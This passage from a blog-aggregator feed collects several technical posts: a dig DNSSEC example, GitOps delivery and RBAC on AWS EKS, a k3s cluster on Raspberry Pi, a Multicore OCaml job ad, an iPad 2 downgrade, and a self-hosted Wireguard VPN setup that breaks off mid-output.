AUTHORITY: 0, ADDITIONAL: 0\n\n;; QUESTION SECTION:\n;dnssec-failed.org.\t\tIN\tA\n\n;; Query time: 335 msec\n;; SERVER: 1.1.1.1#53(1.1.1.1)\n;; WHEN: Mon Nov 11 22:03:50 IST 2019\n;; MSG SIZE  rcvd: 35\nThat pretty much broadly covers some practical examples with dig. I will soon write a detailed post on how DNSSEC validation works and why it needs to be mainstream.\nFin!",[],{"slug":2319,"title":2320,"link":2321,"pubDate":2315,"contentSnippet":2322,"tags":2323,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"gitops-kubernetes","GitOps approach to Continuous Delivery for Kubernetes","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fgitops-kubernetes\u002F","In this post, I’d like to share my experience and learnings about configuring a deployment pipeline for Kubernetes. I’ll be using Gitlab CI\u002FCD and AWS EKS to demonstrate the concept, but the core idea remains the same: all changes must come declaratively from a single source of truth. GitOps is a relatively newer term in the town but goes back to the fundamentals of Infra as Code.\nGitOps fundamentally is an operating model to perform tasks on Kubernetes related to deployments, configuration, secrets and monitoring workloads. All kind of changes must be performed via a single place, which happens to be a git repo. Benefits of that are what basically benefits of version controlling the code is. So why treat infra as any different? 
git happens to be the single source of truth for your infra, rollbacks are as easy as reverting to the last known good configuration, and every change can be observed\u002Fverified.\nGoals#\nA lot of tutorials\u002Fblog posts hitherto cover a very basic scenario where they do kubectl apply and voila, the deployment’s live. However, we all know things are very different (to say the least) in production, so this post will cover all aspects of deployment:\nCreating Manifests\nEnvironment Promotion\nHandling config and secrets\nAuthorization of CI\u002FCD in the cluster\nBasics#\nA GitOps workflow looks like: [architecture diagram in the original post]\nPush vs Pull#\nThere are 2 approaches to how you can handle deployments to a cluster. In a Pull-based approach, the cluster runs a sync controller program which continuously syncs the state of the cluster with a Git repo. Any changes you make to the Git repo will be synced automatically into the cluster. The idea is that there should be no drift between the desired state in the Git repo and the actual state of the cluster. Flux and Argo are good tools if you want a Pull-based pipeline. The merit of a Pull-based pipeline is that it’s more secure, since the deployment actually happens inside the cluster and no external system needs to communicate with your production infra. The demerits: sometimes you have to wait for the changes to be synced (every controller runs this sync process in a loop, with a configurable sleep). Also, using preprocessing tools like Kustomize becomes difficult, since Flux just syncs the state and applies those changes. Handling of secrets is yet another concern you need to look at. And finally, GitOps is relatively new tech, so the tooling is still nascent, and as with any non-battle-tested software, you’re gonna find bugs.\nThe Push approach, however, is the traditional CD approach, where the CD server talks to the cluster and applies changes through commands. In the context of plain EC2 deployments, those commands could be SSHing into a server, running an Ansible playbook, etc. In the context of K8s, however, kubectl does the magic for us. The CD server needs to talk to the K8s API server and run kubectl commands to change the cluster state.\nThe merits of this approach: you can run all sorts of commands inside the deployment pipeline and make it fully customisable. Secrets can also be handled natively (like GitLab env variables) or encrypted in git.\nThe demerit is that your production cluster is now exposed to your CD server.\nOverall, if you have an airgapped CD server with no inbound ports open and access-controlled user auth on the CD system, I find the Push approach preferable. YMMV.\nWriting the pipeline#\nI’ve created a docker image eks-gitops which I’ll be using throughout the pipeline. This container image contains popular tools like kustomize, kubeval etc. and scripts to configure kubectl access to the cluster using aws-iam-authenticator. I’ve written more about how RBAC works inside EKS here.\nExcerpt from .gitlab-ci.yml:\n# Use this as the base image for all jobs unless overridden\ndefault:\n  image:\n    name: mrkaran\u002Feks-gitops:latest\n    entrypoint: ["\u002Fbin\u002Fsh", "-c"]\n### Pipeline\nstages:\n  - validate\n  - deploy\nPrepare the manifests#\nI use Kustomize to prepare the manifests. The advantage of Kustomize is writing template-free YAML while still being able to customise it heavily using overlays. 
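To make that concrete, an overlay is just a kustomization file plus patches. A minimal sketch (the app name is hypothetical; assumes a kustomize version where a directory can be listed under resources):

mkdir -p overlays/prod
cat > overlays/prod/kustomization.yaml <<'EOF'
resources:
  - ../../base                # reuse the shared base as-is
patchesStrategicMerge:
  - replica-count.yml         # prod-only tweaks live in patches
EOF
cat > overlays/prod/replica-count.yml <<'EOF'
apiVersion: apps/v1
kind: Deployment
metadata:
  name: app                   # hypothetical Deployment defined in base/
spec:
  replicas: 3
EOF
kustomize build overlays/prod   # renders base + patches into final manifests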
For different environments, you can apply certain changes like increasing resource requests or adding more storage, while keeping the base the same.\nHere’s a folder structure (from a real GitOps repo) I follow for manifests:\n.\n├── base\n│   ├── deployments\n│   │   ├── app.yml\n│   │   ├── celery.yml\n│   │   └── nginx.yml\n│   ├── ingresses\n│   │   └── web.yml\n│   ├── kustomization.yaml\n│   ├── services\n│   │   ├── app.yml\n│   │   ├── nginx.yml\n│   │   └── redis-headless.yml\n│   ├── statefulsets\n│   │   └── redis.yml\n│   └── volumes\n│       └── redis.yml\n├── kubekutter.yml\n├── Makefile\n├── overlays\n│   ├── dev\n│   └── prod\n│       ├── configs\n│       │   ├── app-config.env\n│       │   └── app-nginx.conf\n│       ├── kustomization.env.yml\n│       ├── namespace.yml\n│       ├── patches\n│       │   ├── configure-configmap-volume.yml\n│       │   ├── modify-alb.yml\n│       │   └── resource-limits.yml\n│       └── rbac.yml\n└── README.md\nShameless Plug: I created kubekutr, which makes managing these manifests with kustomize a breeze.\nSome things to note here:\nInside base\u002F, I keep all the base resources required for the app to run. The resources can be Service, Deployment, Ingress etc.\nInside overlays there are multiple folders for different environments. This is very crucial, as we want to separate the production config from a UAT config. Last-mile configuration of the base becomes very easy with this folder structure, since you now only need to build the manifests by targeting a specific folder in CI.\nInside overlays\u002F{env}\u002Fpatches are all the “patches” you want to apply to the base resources. Think replica count, ALB subnets (since different envs can be in different VPCs), increasing resource limits and stuff like that.\nrbac.yml and namespace.yml are the only missing pieces, because of a chicken and egg problem. I cannot deploy directly (on the first go) from CI\u002FCD if I don’t have a namespace created, since the CD server is configured with only limited, namespace-restricted access. So unless I create a namespace and add proper RBAC for the CD server, I cannot do any deployments from CD. Note however this is only a first-time step, which I guess is okay.\nLint yo manifest#\nI’m using kubeval to lint the manifests. The manifests have to be prepared by kustomize first. CI_ENVIRONMENT_NAME is set by Gitlab when you specify an environment for a job. Don’t sweat about this part, I’ll describe it more as we proceed.\n# Validate the yaml using kubeval\n.lint:\n  extends: .prepare-manifest\n  stage: validate\n  script:\n    - echo \"Linting manifest for ${CI_ENVIRONMENT_NAME}\"\n    - kustomize build overlays\u002F$CI_ENVIRONMENT_NAME --load_restrictor none | kubeval\nSetup environment#\nYou can define environment names as:\n# Create an environment to record all jobs for this env\n.prod: &prod\n  environment:\n    name: prod\n    url: https:\u002F\u002Fprod.site\n.dev: &dev\n  environment:\n    name: dev\n    url: https:\u002F\u002Fdev.site\nAny job which is to be executed in a particular environment can include this variable, and CI_ENVIRONMENT_NAME will be set automatically.\nA cool feature of Gitlab is that you can restrict Variables to the environment they are scoped to.\nConfigure Secrets#\nAll secrets are defined as Environment Variables in the Gitlab CD pipeline (a sketch of how one flows into a kustomize secretGenerator follows below). 
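\nFor illustration, here is a minimal sketch of rendering such a secretGenerator entry inside the CI job. The names are hypothetical (app-secrets, DB_PASSWORD); DB_PASSWORD is assumed to be a Gitlab CI\u002FCD variable available to the runner, and the unquoted heredoc expands it while writing the file:\n# render the env-specific kustomization with the secret baked in\ncat \u003C\u003CEOF > overlays\u002Fprod\u002Fkustomization.env.yml\nsecretGenerator:\n  - name: app-secrets\n    literals:\n      - db_password=${DB_PASSWORD}\nEOF\n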
While running the job, the runner has access to these variables, and with the help of secretGenerator in kustomize, the Secret is created.\nI use secretGenerator because any time a K8s secret changes, kustomize appends a new suffix to its name, which makes the Deployment see a changed pod spec. So a new rollout is automatically triggered.\nAuthenticate to cluster#\nEKS uses aws-iam-authenticator with IAM roles to authorize actions against the cluster. Since this is a push based pipeline, you need to allow access from your CD server to the cluster API on port 443.\nDeploy changes#\nThis is as simple as kubectl apply, which applies the diff between the manifests and the cluster’s current state.\nHere’s a full gitops repo if you’re interested in checking it out:",[],{"slug":2325,"title":2326,"link":2327,"pubDate":2328,"contentSnippet":2329,"tags":2330,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"intro-rbac-kubernetes","Intro to RBAC in EKS","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fintro-rbac-kubernetes\u002F","2019-11-01T12:40:55.000Z","EKS uses a custom authenticator tool called “aws-iam-authenticator”. The basic idea is to make the auth flow in EKS easier by using the tools you already use in AWS.\n\nTo wrap your head around the flow, consider three separate entities:\nA kubernetes resource (entire namespace, specific pods\u002Fconfigs etc)\nAn action (get, watch, list, create, delete etc)\nAn IAM role\u002Fuser created on AWS\nYour usecase might be, for example, to give an IAM role access to a Kubernetes namespace with certain restricted actions.\nSince K8s is basically client-server communication with the API server, we need to perform the following two things for every single API request which goes to the control plane:\nAuthentication\nkubectl talks to the API server using the token generated by aws-iam-authenticator. The API server passes this info on to the AWS servers, which validate whether the originating call is coming from a valid IAM user or not. If not, access is denied by K8s.\nAuthorization\nOnce the IAM user is validated, it needs to be mapped to a K8s user to perform Authorization, so the K8s API server can know whether the action\u002Fresource requested is to be allowed or not. This is where aws-auth-cm.yml comes into the picture. It is basically a map of IAM users to internal K8s groups or users. The roles are associated with these users\u002Fgroups, so once the mapping is done, the K8s API server knows what to do with the API request.\nHow does EKS know my IAM?#\nIf you configured your KUBECONFIG correctly using aws eks update-kubeconfig then you’ll find the below lines in your config file. 
This basically runs an aws-iam-authenticator command using the IAM user\u002Frole configured on your system to produce a token.\n   exec:\n      apiVersion: client.authentication.k8s.io\u002Fv1alpha1\n      args:\n      - token\n      - -i\n      - eks-zero-public\n      command: aws-iam-authenticator\nShow me the YAML already#\nTo create a Role and RoleBinding:\napiVersion: rbac.authorization.k8s.io\u002Fv1\nkind: Role\nmetadata:\n  namespace: coolapp\n  name: fullaccess\nrules:\n- apiGroups: [\"\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n- apiGroups: [\"apps\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n- apiGroups: [\"batch\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n- apiGroups: [\"extensions\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n- apiGroups: [\"autoscaling\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n---\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\u002Fv1\nmetadata:\n  name: 10xdevs-fullaccess\n  namespace: coolapp\nsubjects:\n- kind: Group\n  name: 10xdevs\n  namespace: coolapp\nroleRef:\n  kind: Role\n  name: fullaccess\n  apiGroup: rbac.authorization.k8s.io\nSo, for all the normal folks who don’t grok YAML as fast as 10x devops engineers: I am basically creating a Role fullaccess with all permissions for a namespace coolapp (innovative, ikr). Then I am binding this Role to a Group called 10xdevs so that the group is allocated the role which has the permissions. We will use this group 10xdevs to map our AWS user now.\nTo create the map of IAM Role\u002FUser ARN with the above Role, edit your aws-auth-cm.yml and add the below stuff:\napiVersion: v1\nkind: ConfigMap\nmetadata:\n  name: aws-auth\n  namespace: kube-system\ndata:\n  mapRoles ... \u003Cskipping> ...\n\n  mapUsers: |\n    - userarn: arn:aws:iam::\u003Caccount-id>:user\u002F\u003Cuser-name>\n      username: 10xdevs-fullaccess # RoleBinding name created in previous step\n      groups:\n        - 10xdevs # Group name created in previous step\nVerify it yourself#\nkubectl auth can-i create pods --all-namespaces: should fail\nkubectl auth can-i create pods -n coolapp: should work\nFin!",[],{"slug":2332,"title":2333,"link":2334,"pubDate":2335,"contentSnippet":2336,"tags":2337,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"home-server-setup","Kubernetes cluster on RPi","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fhome-server-setup\u002F","2019-09-22T02:40:55.000Z","So, I got hold of 2 Raspberry Pi4 (still limited stock in India) recently and wanted to build a Kubernetes cluster. Don’t ask why cause that would be pointless. I’ve a little experience with a managed Kubernetes workload (Amazon EKS, which btw deserves its own post 😝) but never really played around with any of the K8s internals yet. In this post, I’ll show you how I got a lightweight Kubernetes distro, K3s, up and running.\nk3s is a pretty great Kubernetes distro which passes the K8s Conformance tests. On ARM architectures, you’re pretty much resource-bound and you want the resource footprint of your infra to be as minimal as possible. k3s makes a few changes: the persistence layer of K8s is backed by SQLite instead of etcd, unused (legacy\u002Falpha) features of K8s are removed, and cloud-provider plugins are not bundled (but can be installed separately). All of this together means just a 40MB binary to run the cluster and ~250MB of memory usage on an idle cluster. 
Awesome, team Rancher :)\n\nAutomation is key, and even though I have just 2 nodes on RPi, I Ansible-ized the setup, which I am hoping will save time in the future if I add more nodes.\nHardware#\n1x RPi4 4GB and 1x RPi4 2GB variant\n2x Samsung EVO micro SD Card\n2x USB-C Cables\n1x Anker PowerPort (don’t compromise on the power supply, give enough juice so the RPi doesn’t throttle)\n1x TP-Link Network Switch (my router has only 1 usable LAN port)\n2x CAT5 LAN cables (keeping it basic, you can get fancy flat LAN cables if you wish to)\nThis is how the final setup looks:\n(embedded tweet with a photo of the setup)\nSetting up RPi#\nI downloaded Raspbian Buster Lite because it’s the easiest to set up. The next step is to flash the SD card, and for that I used Etcher.\n\nTo enable SSH access, you need to create an empty file named ssh on the boot partition.\nsudo touch \u002Fboot\u002Fssh\nOnce all sorted, we can use Ansible to set up the basic OS stuff, like changing the default password, enabling password-less SSH login, timezone & locale settings, changing the hostname etc. I’ll be sharing relevant Ansible snippets; if interested, you can check out the complete playbook in the mr-karan\u002Fhydra repo.\nWe need to enable container features on the RPi so that containerd can run. Container runtimes like Docker make use of cgroups (a Linux kernel feature) which allow them to put resource limits on container processes, like CPU and Memory. To enable cgroups, you need to edit \u002Fboot\u002Fcmdline.txt.\n- name: Add cgroup directives to boot command line config\n  lineinfile:\n    path: \u002Fboot\u002Fcmdline.txt\n    regexp: '((.)+?)(\\scgroup_\\w+=\\w+)*$'\n    line: '\\1 cgroup_enable=cpuset cgroup_memory=1 cgroup_enable=memory'\n    backrefs: yes\nQuick Tip: If you’re going to use the RPi as a headless server (not connected to any monitor) you can reduce the GPU memory to the lowest possible (16M)\n- name: Set GPU memory split to 16 MB\n  lineinfile:\n    path: \u002Fboot\u002Fconfig.txt\n    line: \"gpu_mem=16\"\n    create: yes\nDeploy K3s cluster#\nNext, we’ll come to the actual stuff, where we’ll download the K3s binary and run it as a systemd service. There’s a handy shell script provided by the Rancher team to bootstrap the cluster, which sets up the whole thing in one command. But if you wanna learn\u002Fplay around, I’d recommend you do things the hard way (it’s not all that hard tho (twss!)).\n- name: Download k3s binary armhf\n  get_url:\n    url: https:\u002F\u002Fgithub.com\u002Francher\u002Fk3s\u002Freleases\u002Fdownload\u002F{{ k3s_version }}\u002Fk3s-armhf\n    dest: \u002Fusr\u002Flocal\u002Fbin\u002Fk3s\n    owner: root\n    group: root\n    mode: 755\n  when: ( ansible_facts.architecture is search(\"arm\") )\n    and\n    ( ansible_facts.userspace_bits == \"32\" )\nOn the worker node, the process is similar, except you have to run K3s with the agent argument instead of the server argument used on the control plane. Things get a bit interesting here though. You need to give the cluster server URL along with its token in the command. A unique token is generated by the server at \u002Fvar\u002Flib\u002Francher\u002Fk3s\u002Fserver\u002Fnode-token, which is used to join the worker nodes.\nI did a bit of google-fu and got to know about this neat little Ansible module set_fact which lets you “store” a variable from one host and use it on a second host. Every Ansible host maintains a Python dict of “host facts” (you can inspect these yourself, as the sketch below shows). 
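\nA quick way to peek at these facts from the control machine, as a sketch (control is the inventory group used for the server node in this setup):\n# dump every fact Ansible gathers for the control node\n$ ansible control -m setup\n# or filter down to a single fact\n$ ansible control -m setup -a \"filter=ansible_architecture\"\n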
On the second node, I access the first host’s fact dict, fetch the variable and use it in its systemd service template. Neat, ain’t it? Ansible has so many modules, it is mind-boggling.\nReading and storing the variable as a “host” fact:\n# on the cluster\n- name: Read node-token from control node\n  slurp:\n    src: \u002Fvar\u002Flib\u002Francher\u002Fk3s\u002Fserver\u002Fnode-token\n  register: node_token\n\n- name: Store control node-token\n  set_fact:\n    k3s_cluster_token: \"{{ node_token.content | b64decode | regex_replace('\\n', '') }}\"\nUsing the variable from the server host, in a template on the agent host:\n# on the agent (vars.yml)\nk3s_server_address: \"{{ hostvars[groups['control'][0]].k3s_server_address }}\"\nk3s_cluster_token: \"{{ hostvars[groups['control'][0]].k3s_cluster_token }}\"\n# use the value in a template\n...\n[Service]\nExecStart=\u002Fusr\u002Flocal\u002Fbin\u002Fk3s agent --server {{ k3s_server_address }} --token {{ k3s_cluster_token }}\n...\nP.S. Shoutout to Ansible tho. It is one of my fav infra tools out there. It has some gotchas that you need to be aware of, but by and large the experience has been quite pleasant.\nOn the cluster, you should be able to see the nodes.\n\n\nTeam #SelfHost#\nI am planning to host Bitwarden, Gitea and a Nextcloud instance on this cluster. I will also be using this as a testbed to play around with K8s internals. Stay tuned as I explore more of this!\nCheers! :)",[],{"slug":2339,"title":2340,"link":2341,"pubDate":2342,"contentSnippet":2343,"tags":2344,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"1115-multicore-job","Multicore OCaml Jobs","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002Fjob\u002F2019\u002F09\u002F16\u002F1115-multicore-job\u002F","2019-09-16T11:59:00.000Z","Multiple Research Software Engineer positions are available in the\nDepartment of Computer Science and Engineering at\nthe Indian Institute of Technology, Madras to develop\nMulticore OCaml and enable the\nTezos ecosystem to benefit from Multicore OCaml.\n A dog, a deer and a monkey walk into a coffee shop... \n\n\n\nBackground\nThe Multicore OCaml project aims to add native support for scalable concurrency\nand shared memory parallelism in OCaml. At its core, Multicore OCaml extends the\nOCaml programming language with effect handlers for expressing scalable\nconcurrency and a high-performance concurrent garbage collector aimed at\nresponsive networked applications. Multicore OCaml is also the first\nindustrial-strength language to come equipped with an efficient yet modular\nmemory model, allowing high-level local program reasoning while retaining\nperformance. Multicore OCaml is actively being developed and core features are\nbeing upstreamed to OCaml.\nTezos is an open-source smart contract platform for decentralized applications\nand assets. Tezos uses a self-amending cryptographic ledger: it achieves\nconsensus not just about the state of a ledger, but about the state of its own\nprotocol. The primary protocol of Tezos utilizes proof of stake and supports\nTuring complete smart contracts in a domain-specific language called Michelson.\nThe Tezos codebase is written in OCaml and extensively uses OCaml ecosystem\nlibraries and tools such as Lwt, OPAM, and Irmin.\nRoles\nThere are two roles:\nCompiler Engineer: Runtime system improvements to the OCaml programming\nlanguage in order to make it compatible with multicore support. 
Implementing\nnew features in the Multicore OCaml compiler.\nApplication Engineer: Developing core OCaml libraries that take advantage\nof multicore support. Adding parallelism support for Tezos ecosystem libraries\nand tools such as Lwt, Irmin, and dune.\nPositions\nThe positions available, with minimum qualifications and monthly pay ranges:\nProject Engineer: BE \u002F BTech \u002F Master’s in Science \u002F MCA or equivalent; Rs.21,500 to Rs.75,000\nSenior Project Engineer: ME \u002F MTech, or BE \u002F BTech \u002F Master’s in Science \u002F MCA or equivalent with 2 years experience; Rs.27,500 to Rs.1,00,000\nSenior Project Officer \u002F Post-doctoral Researcher: Ph.D. in Engineering or Sciences, or ME \u002F MTech with 3 years experience, or BE \u002F BTech \u002F Master’s in Science \u002F MCA or equivalent with 5 years experience; Rs.35,000 to Rs.1,50,000\nPrincipal Project Officer: Ph.D. in Engineering or Sciences with 7 years experience, or ME \u002F MTech with 10 years experience, or BE \u002F BTech \u002F Master’s in Science \u002F MCA or equivalent with 12 years experience; Rs.48,000 to Rs.2,25,000\nThe appointment will be made for 6 months initially and can be extended up to 2\nyears. The project engineers have the option of enrolling in the MS program at\nCSE, IIT Madras after 6 months. Such candidates may appear for the interview\ndirectly, without having to write GATE.\nYou will work closely with the OCaml Labs group,\nUniversity of Cambridge, UK and Tarides, France. All of\nthe work done will be made available as liberally licensed open-source software.\nSkills\nCompiler Engineer\nNecessary:\nExcellent working knowledge of C, concurrent and parallel programming\nKnowledge of compilers (not necessarily of functional programming languages),\noperating systems, x86 & ARM assembly programming\nDesired:\nExperience developing and\u002For maintaining performant software systems\nExperience with a functional programming language such as Haskell, OCaml,\nScala, Scheme, Elm, or Elixir.\nTrack record of open source contributions.\nUnderstanding of benchmarking techniques and analyzing results\nApplications Engineer\nNecessary:\nExcellent working knowledge of operating systems, concurrent and parallel\nprogramming\nExperience with a functional programming language such as Haskell, OCaml,\nScala, Scheme, Elm, or Elixir.\nDesired:\nTrack record of contributions to large open-source software systems\nUnderstanding of benchmarking techniques and analyzing results\nApply\nWrite to kcsrk@iitm.ac.in with the subject “IITM Multicore OCaml 2019:\nCompiler Engineer” or “IITM Multicore OCaml 2019: Application Engineer” based on\nthe role to express interest. Please include:\nCurriculum Vitae\nA summary of your experience in relevant technologies and software\nAny open source contributions",[],{"slug":2346,"title":2347,"link":2348,"pubDate":2349,"contentSnippet":2350,"tags":2351,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"ipad-downgrade-ios-6-8","Downgrading my iPad 2 to iOS 8","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F08\u002F11\u002Fipad-downgrade-ios-6-8\u002F","2019-08-11T00:00:00.000Z","Update: Apple is no longer signing iOS6 for the iPad 2, so this is no longer feasible.\nI own an iPad 2 (GSM), which is rarely used these days because it is too slow with the latest iOS 9 upgrades. 
It is an 8-year-old device, but I can’t just install Linux on it and make it usable, which is what I do with most other devices.\nThe next best thing was to downgrade the iOS version. The device is unsupported at this point anyway, so I might as well go there. Apple has restrictions on which iOS releases are installable at any point on any device, ~but thankfully they are still signing iOS6 for my device for some legal reasons~.\nSteps:\nDownload the iOS firmware for your device from https:\u002F\u002Fipsw.me\u002F#platform\nLaunch iTunes\nOption+Click on the Restore button in iTunes\nSelect the file you just downloaded.\nDisable iCloud on the device\nUpgrade to iOS8\nThis is possible as long as Apple is signing the IPSW for your device. The case of iOS6 being signed seems to be true for:\niPhone 4S\niPad 2\nSecurity Notes\nRunning an unsupported OS is not something I take lightly. Here’s a list of defensive measures I took to ensure that I’m not at risk while doing so:\nTry to keep the device always in Airplane mode.\nKeep sensitive data off the device. No photos\u002Fkeychain sync, for example. Don’t enable Calendar\u002FContact\u002FMedia sync.\nEnable Restrictions on the device:\n    \nRestrict Safari to limited websites.\nDisable application installs.\nDisable iTunes store\u002FiBooks store etc.\nDisable GPS\u002FBluetooth.\nLimit Background Refresh to very few trusted applications.\nLimit the number of applications (I only have Kybooks installed).\nDisable Javascript on Safari.\nIf possible, I’d recommend using a separate Apple Account on the device.",[],{"slug":2353,"title":2354,"link":2355,"pubDate":2356,"contentSnippet":2357,"tags":2358,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"personal-networking-setup","My Personal Networking Setup","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fpersonal-networking-setup\u002F","2019-06-29T12:40:55.000Z","If I have nothing to hide then I have nothing to show either\nWhen you visit a site from your browser, there are several entities which have access to this information in one request-response cycle. Starting from the router you connect to, to the DNS resolver you use to resolve the IP address of the site, and finally the ISP, which has access to the raw network packets (unencrypted or encrypted). They are all insecure by default, and most users on the internet do not care about their privacy. ISPs can very easily profile you by the queries you make and sell that data to 3rd party ad companies. There are still a huge number of sites on the world wide web which don’t have basic SSL encryption turned on. Even with HTTPS turned on, your ISP can simply see the unencrypted DNS queries and figure out the site you’re visiting. Browser fingerprinting is another well-known technique where you can be easily profiled based on the different parameters exposed by your browser, generating patterns from your browsing habits.\nIf you’re a human you already care about your privacy. You won’t give out your Whatsapp chats to a random stranger on the street to read, you won’t leave the door open while bathing, you won’t leave your credit card details out in the open, you will have a closed private discussion with your second half. Everyone does care about privacy in real life and everyone should care about the same online too.\n“Some” social media companies exist solely on the data you provide. They are in the business of selling data and they don’t care a bit about your privacy. 
Every ad company out there wants an online persona of you, to feed you “personalized” recommendations. You may argue that they are “useful”, but you cannot deny the fact that they are invading your privacy. You won’t like unwanted relationship advice from your neighbour when he hears you both fighting in the middle of the night. No one likes invaders, period.\nCorrelation of data points is easy to do in this age of ML\u002FAI (Malai). Re-iterating an example I read somewhere on the interwebz: say you search for a very generic term like “cancer”. This alone doesn’t indicate that you have cancer; it merely suggests that you are interested in knowing more about the disease. Now maybe a few days later you search for the phrase “buy a wig online”. These 2 search queries put together can suggest that you’ve had chemotherapy done recently. This may or may not be information you want to hide, but you do want to have the option, right?\nThat’s what the whole fight against companies which invade your privacy is about. You have absolutely no choice. You’re devoid of any choice.\nGoogle is your friend\nYou may not even realise it, but we’ve all been guilty of Googling some random shit for fun, googling about anxiety or depression when feeling low, how to lose weight and all such seemingly embarrassing questions, and we simply confess these things to Google thinking that no one is spying on us or being judgemental of us and we’re in a safe zone. What if this “friend” is the one who’s stabbing you in the back? No surprises there! You don’t even know, but these search engines might have already shared all such queries with several 3rd party providers and businesses who are on the lookout for such data.\nI am scared\nI hope by now you’re convinced that you want some basic privacy online. If not, stop reading here, because if this didn’t persuade you enough, nothing will and the rest of the blog is pretty useless for you anyway, so thanks for stopping by!\nFor the rest of us folks, there are a few practical things we can start with immediately. These require very little effort but are a good kickstart.\nUse a DNS over HTTPS (DoH) based resolver (personal choice: 1.1.1.1)\nUse a browser which doesn’t ship with its own god damn resolver (personal choice: Firefox)\nUse an Ad-Blocker (personal choice: uBlock Origin)\nWith just the above 3 steps, you’ve achieved the following:\nISPs cannot see your DNS queries in plain text\nWebsites cannot serve you random js code in the name of ads\nA web browser which is more focused on privacy in general\nIf you’re someone who wants to spend a bit more time (trust me, it won’t take even one hour) and a bit of money (one movie ticket a month), you should host your own personal VPN. VPNs are awesome because you mitigate a lot of privacy invaders and you generally browse more anonymously. Theoretically, we have shifted the trust from the ISP to the cloud provider where the VPN is hosted, yes. But as long as you’re not doing anything illegal in the eyes of the state, you should be fine.\nProtip: Don’t use a VPN to do something stupid. You are always trackable. The whole exercise is to not allow bad actors to access your personally identifiable information online and to have a non-intrusive browsing experience. If you think that by using VPNs you can get away with doing something which is illegal in your state, then you’re wrong.\nTools I use#\nVPN: Wireguard\nAdblocking: Pi-hole\nDNS Resolver: Unbound\nThe setup is pretty straightforward. 
I use the Wireguard client on my MBP and an Android device to connect to the Wireguard VPN server hosted on a $5 DO droplet in Bengaluru, India. For ad-blocking, I use Pi-hole, which does DNS based ad-blocking. And finally, to resolve the DNS queries I use vanilla unbound without any forwarders.\nRead the following sections to know more about each of the above pieces.\nSetting up wireguard VPN#\nWireguard gets all the love from me (thanks to @sarat for telling me about this). It is probably the best option out there if you’re looking to self-host a VPN. Wireguard gets a lot of things right, the first being the ease of setup. It literally takes a few commands and you’re all set. Wireguard is very lightweight and consumes minimal resources. Wireguard has better encryption and is a lot faster than IPsec or OpenVPN. Cloudflare’s new app Warp is also based on Wireguard. Oh, and did I mention that Wireguard seamlessly transitions when you switch networks (which happens all the time when you’re on shitty 4G networks\u002Fpublic WiFi)?\nWireguard basically has 2 parts. One is the server and the other is the client.\nWireguard sits in its own separate network namespace, from which the traffic is received or sent. This namespace is responsible for passing your traffic on to the actual interface of the network card on the device (which is probably wlan or eth).\nInstalling Wireguard#\n$ sudo add-apt-repository ppa:wireguard\u002Fwireguard\n$ sudo apt-get update\n$ sudo apt-get install wireguard-dkms wireguard-tools linux-headers-$(uname -r)\nGenerating Public\u002FPrivate key pair#\n$ umask 077\n$ wg genkey | tee server_private_key | wg pubkey > server_public_key\n$ ls\nserver_private_key  server_public_key\nConfiguring Wireguard (server)#\n$ touch \u002Fetc\u002Fwireguard\u002Fwg0.conf\n$ vim \u002Fetc\u002Fwireguard\u002Fwg0.conf\n# Add the following lines and modify the values\n[Interface] # Configuration settings for a separate network interface\nAddress = 10.200.200.1\u002F24 # You can choose any private subnet\nSaveConfig = false # Wireguard can configure additional peers automatically without reloading wireguard, for some reason this didn't work well for me\nPrivateKey = \u003Credacted> # Contents of the server_private_key file generated in the above step\nListenPort = 51820 # Default port\n\n# Add the peers (clients which connect to the wireguard server)\n[Peer]\n# MBP\nPublicKey = \u003Claptop_public_key>\nAllowedIPs = 10.200.200.2\u002F32\n[Peer]\n# Android\nPublicKey = \u003Cphone_public_key>\nAllowedIPs = 10.200.200.3\u002F32\nConfiguring Wireguard (client)#\nRepeat the step of generating a Public\u002FPrivate key pair. You can also take a look at Subspace, which is a nice GUI tool which helps you create additional profiles for devices where generating a key pair is not convenient, like mobile phones. 
I didn’t get the time to set it up personally, so I generated the public\u002Fprivate keys from my laptop itself and then configured them manually using Viscerion, an Android wireguard client app.\nFor the client, your config file should look like:\n[Interface]\nPrivateKey = \u003Cclient_private_key>\nAddress = 10.200.200.2\u002F32\n\n[Peer]\nPublicKey = \u003Cserver_public_key>\nAllowedIPs = 0.0.0.0\u002F0\nEndpoint = \u003Cpublic_ip_droplet>:51820\nPersistentKeepalive = 25\nRecap#\nIf you got overwhelmed at this point, let’s recap what just happened.\nWe have 2 config files, one for the server and one for the client, which happens to be my laptop. On each of the devices, generate a public\u002Fprivate key pair.\nOn the server side, while configuring the peer, give the public key of the client. On the client side, while configuring the peer, give the public key of the server. This is similar to how ssh works. Wireguard uses the Curve25519 crypto technique to generate a public\u002Fprivate key pair, which honestly looks so much better than lengthy ECDSA\u002FRSA ones :P\nNow let us start the wireguard service. wireguard provides a nice wrapper, wg-quick, which does the following things when you bring the interface up:\nsudo wg-quick up wg0\n[#] ip link add wg0 type wireguard\n[#] wg setconf wg0 \u002Fdev\u002Ffd\u002F63\n[#] ip -4 address add 10.200.200.1\u002F24 dev wg0\n[#] ip link set mtu 1420 up dev wg0\nYou can verify the new network interface now by:\n$ ip addr | grep wg0\n5: wg0: \u003CPOINTOPOINT,NOARP,UP,LOWER_UP> mtu 1420 qdisc noqueue state UNKNOWN group default qlen 1000\n    inet 10.200.200.1\u002F24 scope global wg0\nYou can also view the wireguard connection status by:\n$ sudo wg show\ninterface: wg0\n  public key: 